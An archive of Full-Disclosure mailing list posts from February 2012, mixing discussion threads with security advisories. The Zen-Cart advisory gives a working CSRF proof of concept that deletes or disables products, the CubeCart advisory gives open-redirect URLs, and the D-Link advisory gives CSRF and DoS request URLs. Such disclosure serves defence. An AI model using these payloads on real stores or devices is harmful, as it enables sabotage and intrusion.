padding: 10px; border-top: 1px solid rgb(170, 170, 170);
background-color: rgb(255, 255, 255); display: block;`` FQDN Hostname
br/
input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]``
iframe=`` value= name=``frm_pserver_c_realhostname`` class=``
frm_pserver_c_realhostname textbox``/`` size=``30`` /div div
align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170,
170, 170); background-color: rgb(250, 248, 248); display: block;`` Load
Threshold At Which Warning Is Sent br/
input width=``60%``
type=``text`` size=``30`` value=``20``
name=``frm_pserver_c_load_threshold``
class=``frm_pserver_c_load_threshold textbox``/ /div input type=
``hidden`` value=``update`` name=``frm_action``/
input type=``hidden`` value=``information`` name=``frm_subaction``/
Reference(s):
../command-center.txt
Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit anonymous product metrics to Mozilla
On Fri, 10 Feb 2012 03:51:53 GMT, Nick Boyce said: OT: They should just make FF quality high and the design impeccable - Quality high is always a nice concept. But there's always 5 quality issues and resources to fix only 3. Obviously, you want to fix the 3 that matter most to your users - but which 3 are they? You really can't rely on bug reports or surveys, because those tend to have a major self-selection bias. Think about it - how many people do you know that use Firefox? How many of them have had it crash or misbehave? How many of them *reported* it? Surveys have the same problem - you can't easily run a survey of users who just want to hit their sites and *do* stuff and find out what they want - because they'll just skip your survey, hit their site, and *do* stuff. Unless of course you make the survey mandatory - in which case you tick them off because you got in the way of hitting their site and doing stuff. Or report the list of extensions and performance numbers - it's one thing to know that users have a range of launch times. It's something else to know that 20% of users have *consistently* longer launch times on comparabie hardware. But if you have data that shows that NoScript users take a 15% launch time hit, *that* is something you can then go do something about. Similar problems for impeccable design - if you want a browser that Joe Sixpack will actually *use*, then you need data on how Joe actually wants to use that browser. And *asking* Joe never works - anybody who's had to do project requirements will tell you that what the user *says* they want, what they *think* they want, and what they actually need, are almost always 3 different things. No, I'm not saying it's OK for the Mozilla crew to collect PII like that - but I can certainly understand why they feel the temptation to do so... pgpaPLdB9Z9Fa.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit anonymous product metrics to Mozilla
Hi, I can imagine that developers want to have a clue what they need to repair. I only have a problem the way they do it and the way my behavior is exposed without possible influence. Let's say for the sake of argument, that 20% on similar hardware have a problem with loading times and the developers have the metrics to prove so (waiting times, load times, scripts I use, etc...) Would the conclusion be, that Firefox is at fault? - What if the major part of that % is living in a certain continent? - What if the major % has the same ISP? - How is the spread of OS usage? - etc, etc Without the surrounding parameters known, you have a pile of bytes instead of DATA (people tend to mix those definitions). Of course you could make fuzzy statistics out of it, but like most mathematicians know: statistics prove predetermined conclusions. Still would a 5% speed increase weigh up to the privacy of 200 million users? Like in the bugtrack stated. If my instance of firefox is PII bound, you can trace my laptop, determine behavior, etc... And to conclude: Modzilla states they don't intent to use the data in any other way: I have a couple of questions about the intent: - Will that intent stay the same throughout the future? The intent can easily be changed when money gets involved. - What if a legal entity (like a government, The Music branch protectors(to prove that the piratebay is used so often), etc...) kindly requests the data with a court-order? Also take into account the following: Since 2012, the Netherlands has a new law which forbids behavior analysis by persistent cookies...All advertisement companies are now looking into device identification. Why: they can make more money when they show you the right adds. Modzilla will help them a great deal if they can offer them a PII out of stock... And I see the comments, they won't do that! Do you want to bet 1 million bugs over it that they won't do it? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: vrijdag 10 februari 2012 15:48 To: Nick Boyce Cc: full-disclosure Subject: Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit anonymous product metrics to Mozilla On Fri, 10 Feb 2012 03:51:53 GMT, Nick Boyce said: OT: They should just make FF quality high and the design impeccable - Quality high is always a nice concept. But there's always 5 quality issues and resources to fix only 3. Obviously, you want to fix the 3 that matter most to your users - but which 3 are they? You really can't rely on bug reports or surveys, because those tend to have a major self-selection bias. Think about it - how many people do you know that use Firefox? How many of them have had it crash or misbehave? How many of them *reported* it? Surveys have the same problem - you can't easily run a survey of users who just want to hit their sites and *do* stuff and find out what they want - because they'll just skip your survey, hit their site, and *do* stuff. Unless of course you make the survey mandatory - in which case you tick them off because you got in the way of hitting their site and doing stuff. Or report the list of extensions and performance numbers - it's one thing to know that users have a range of launch times. It's something else to know that 20% of users have *consistently* longer launch times on comparabie hardware. But if you have data that shows that NoScript users take a 15% launch time hit, *that* is something you can then go do something about. Similar problems for impeccable design - if you want a browser that Joe Sixpack will actually *use*, then you need data on how Joe actually wants to use that browser. And *asking* Joe never works - anybody who's had to do project requirements will tell you that what the user *says* they want, what they *think* they want, and what they actually need, are almost always 3 different things. No, I'm not saying it's OK for the Mozilla crew to collect PII like that - but I can certainly understand why they feel the temptation to do so... DISCLAIMER : This message is sent in confidence and is only intended for the named recipient. If you receive this message by mistake, you may not use, copy, distribute or forward this message, or any part of its contents or rely upon the information contained in it. Please notify the sender immediately by e-mail and delete the relevant e-mails from any computer. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
On Fri, 10 Feb 2012 07:40:03 GMT, farthva...@hush.ai said: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. Nice sound bite there. So tell us - what alternative brand should we buy instead? Include in your discussion a proof that the alternative doesn't have other, even worse, security issues. pgpvKPZFzbBVD.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability
1. OVERVIEW The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION The CubeCart 3.0.20 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the parameters,goto and r. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site (domain.com) to an arbitrary web site (localhost) of the attacker's choice. 4. VERSIONS AFFECTED 3.0.20 and lower (aka 3.0.x family) 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/cube3.0.20/switch.php?r=//yehg.net/lang=es http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. Upgrade to CubeCart 4x/5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-02-10: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection CubeCart Home Page: http://cubecart.com/ OWASP Top 10 2010 - A 10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards SANS Top 25: http://cwe.mitre.org/top25/#CWE-601 CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2012-02-10] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Zen-Cart Admin CSRF/XSRF - Delete / Disable Products | UPS-2011-0018 | CVE-2011-4403
*Advisory Information* Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products Date published: 2012-02-10 01:59:45 AM upSploit Ref: UPS-2011-0018 CVE REF: CVE-2011-4403 *Advisory Summary* An attacker can force an administrator to delete or disable products from within his store. *Vendor* Zen-Cart *Affected Software* Zen-Cart v1.3.9h Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source shopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be and should be done differently. *Description of Issue* This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By submitting this form from any location an attacker can cause the administrator to delete / disable products from his store. *PoC* Requirements 1. Admin user (target) must have a valid session id. Even if they have closed the admin window, this attack is still successful 2. The attacker must obtain the admin url * Social Engineer an admin user (trick them) * Packet Capture * Email headers * Invoice print out * * I know these have been addressed in your security forum topics, but most users are not aware of these issues 3. The attacker must obtain the product id * This is public information 4. The attack must then social engineer (trick them) into loading the page * Email with images * Post a forum topic with the images * Link them to a page on the attacker’s server Proof of Concept Delete: This form can be hidden and made to submit automatically on page load: form name=products action= http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm; method=post label for=securityTokenSecurity Token/labelbr/input type=text name=securityToken value=Can be anything… /br/br/ label for=products_idProducts ID/labelbr/input type=text name=products_id value=329br/br/ label for=product_categories[]Products Category/labelbr/input type=text value=48 name=product_categories[]br/br/ input type=submit border=0 alt=Delete value= Delete Product /form Disable: img src= http://www.mysite.com/path_to_admin/categories.php?action=setflagflag=0pID=1 / img src= http://www.mysite.com/path_to_admin/categories.php?action=setflagflag=0pID=2 / img src= http://www.mysite.com/path_to_admin/categories.php?action=setflagflag=0pID=3 / img src= http://www.mysite.com/path_to_admin/categories.php?action=setflagflag=0pID=4 / img src= http://www.mysite.com/path_to_admin/categories.php?action=setflagflag=0pID=5 / Proposed Solution * Add the security token conditional statement to the delete_product_confirm.php for all product types * This should be applied to all requests made within the admin control panel rather than just key operations *Credits* DisK0nn3cT *References* http://www.zen-cart.com/ http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005) *Patch/Fix* Update to the latest version ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks If bureaucratic, QA, and legal issues emerge, you can't even get the names of the people you need to speak to in less than 2 weeks, let alone schedule a conference call. Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. Sent from my iPhone On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple CSRF, DoS and XSS vulnerabilities in D-Link DAP 1150
Hello list! I want to warn you about new security vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router). These are Cross-Site Request Forgery, Denial of Service and Cross-Site Scripting vulnerabilities. This is my fourth advisory from series of advisories about vulnerabilities in D-Link products. SecurityVulns ID: 12076. These vulnerabilities are in device admin panel in Access Point mode. In Router mode there are many new sections appear in admin panel which are vulnerable to CSRF and XSS. - Affected products: - Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link decided not to fix these vulnerabilities, the same as they still haven't fixed many vulnerabilities in DSL-500T (form 2005). -- Details: -- CSRF (WASC-09): http://192.168.0.50/index.cgi?res_cmd=20res_buf=nullres_cmd_type=blv2=yrq=y Via CSRF it's possible to save configuration. It's needed for saving settings after restarting of the device. Also via CSRF it's possible to do operations Reboot, SaveReboot and Logout. DoS (WASC-10): Remove restarting of the device: http://192.168.0.50/index.cgi?res_cmd=6res_buf=nullres_cmd_type=nblv2=yrq=y CSRF (WASC-09): In section Net / Connections via CSRF it's possible to add connections (such types as PPPoE, IPoE, L2TP, PPTP), to remove connections and to change settings of existent connections. XSS (persistent) (WASC-08): In section Net / Connections at adding or editing of connections it's possible to set XSS code in subsection Main in field Name. The code will execute at page Connections. In section Net / Connections at adding or editing of connections it's possible to set XSS code in subsection Static DHCP in field Host name. The code will execute at page Main in connection's properties. CSRF (WASC-09): In section Wi-Fi in subsections Security settings, WPS via CSRF it's possible to change security settings. In section Wi-Fi in subsections Basic settings, MAC-Filter (Filter mode, MAC-addresses), Station List, WDS, Additional settings, WMM, Client, in section Advanced / Device mode, in section System in subsections System log, NTP client via CSRF it's possible to change settings. Timeline: 2011.11.17 - found vulnerabilities. 2011.12.13 - announced at my site. 2011.12.16 - informed developers. 2012.02.09 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5567/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Off-Spanish] Webinario gratuito - Ataques DoS en latino america
Fecha y hora: Sabado, Febrero 11 2012 - 18:00 PM ( Hora Argentina GMT - 3:00 ) En el webinario veremos de forma practica y teorica como se ejecutan los ataques de denegacion de servicio, haremos pruebas contra ambientes reales que los asistentes propogan usando botnets y exploits. Orador: Juan Sacco Software a utilizar: Exploit Pack Organizador: http://exploitpack.com Link de registracion: http://www.anymeeting.com/PIID=EC50DD89874F Duracion: 1 hora Saludos Juan Sacco ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Android Malware Botnet Reversed/Uncovered
Hello, one of InfoSec Institute's security researchers reverse engineered a new botnet that is active for the Android platform. RootSmart has some unique features that make it newsworthy: . Takes advantage of Gingerbreak exploit to take control of Android device . The main malware payload is a rootkit that hides itself inside of legit app . The rootkit hooks itself into the legit app as a boot service . The rootkit installs its own shell into the OS, allowing it to silently install other packages . Encrypts the CC URLs with a clever non-standard communication stream RootSmart is a successful botnet in the wild, between 10,000 and 30,000 devices are currently infected per Symantec. We were also able to uncover the CC server locations, they are currently active and residing in China. More details are available here: http://resources.infosecinstitute.com/rootsmart-android-malware/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2012:016 ] glpi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:016 http://www.mandriva.com/security/ ___ Package : glpi Date: February 10, 2012 Affected: Enterprise Server 5.0 ___ Problem Description: A File Inclusion vulnerability was discovered and corrected in GLPI. This advisory provides the latest version of GLPI (0.80.7) that is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037 http://seclists.org/fulldisclosure/2012/Feb/157 ___ Updated Packages: Mandriva Enterprise Server 5: 14b099816fb703b7e9f83d51d5d93b7e mes5/i586/glpi-0.80.7-0.1mdvmes5.2.noarch.rpm c6c175f0c94f1958634729eac1a1938b mes5/SRPMS/glpi-0.80.7-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 6f7c10598a345e9dbb2b335f5af94174 mes5/x86_64/glpi-0.80.7-0.1mdvmes5.2.noarch.rpm c6c175f0c94f1958634729eac1a1938b mes5/SRPMS/glpi-0.80.7-0.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPNT2wmqjQ0CJFipgRAt8mAJ9XAlt4iCM/9L9IGi1g35NoCoU7dACfet8j cWjfG0V0Fhnfg3PzsWytPaQ= =eVYT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse problems? :)) On Feb 10, 2012 10:12 AM, Dan Kaminsky d...@doxpara.com wrote: Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks If bureaucratic, QA, and legal issues emerge, you can't even get the names of the people you need to speak to in less than 2 weeks, let alone schedule a conference call. Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. Sent from my iPhone On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
According to the Reaver people, DD-WRT doesn't support WPS at all :) On Fri, Feb 10, 2012 at 2:00 PM, Zach C. fxc...@gmail.com wrote: Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse problems? :)) On Feb 10, 2012 10:12 AM, Dan Kaminsky d...@doxpara.com wrote: Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks If bureaucratic, QA, and legal issues emerge, you can't even get the names of the people you need to speak to in less than 2 weeks, let alone schedule a conference call. Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. Sent from my iPhone On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Waidaminnit... Didn't you try to sell me a belkin the other day? Conflict of interest there Sent from my BlackBerry® wireless device -Original Message- From: valdis.kletni...@vt.edu Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 10 Feb 2012 11:06:49 To: farthva...@hush.ai Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
On Fri, 10 Feb 2012 14:41:37 EST, Dan Kaminsky said: According to the Reaver people, DD-WRT doesn't support WPS at all :) The sort of people that run DD-WRT probably consider that a feature, not a bug. ;) pgpXK8cycHsYF.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
On Fri, Feb 10, 2012 at 4:33 PM, valdis.kletni...@vt.edu wrote: On Fri, 10 Feb 2012 14:41:37 EST, Dan Kaminsky said: According to the Reaver people, DD-WRT doesn't support WPS at all :) The sort of people that run DD-WRT probably consider that a feature, not a bug. ;) If you've got the skill to install DD-WRT, you've got the skill to manually set up WPA2. Note, by the way, the core concept of WPS (that setup should be easy) was absolutely correct, and we have hard data that it worked. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Announcement] ClubHack Mag - Call for Articles
Hello All, ClubHack Magazine is seeking submissions for next issue, Issue 26 - March 2012. Topics:- 1. Web App Sec 2. OS Exploitation and Security 3. Cryptography and cryptanalysis Few guidelines : 1) Keep the language as easy as possible. Screen shots will be of help. 2) Along with article send us your photograph and small intro. 3) Submissions due date - 27th of this month Send in your articles to abhij...@clubhack.com Regards, Abhijeet Patil, Co-Founder, CHMag http://chmag.in ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
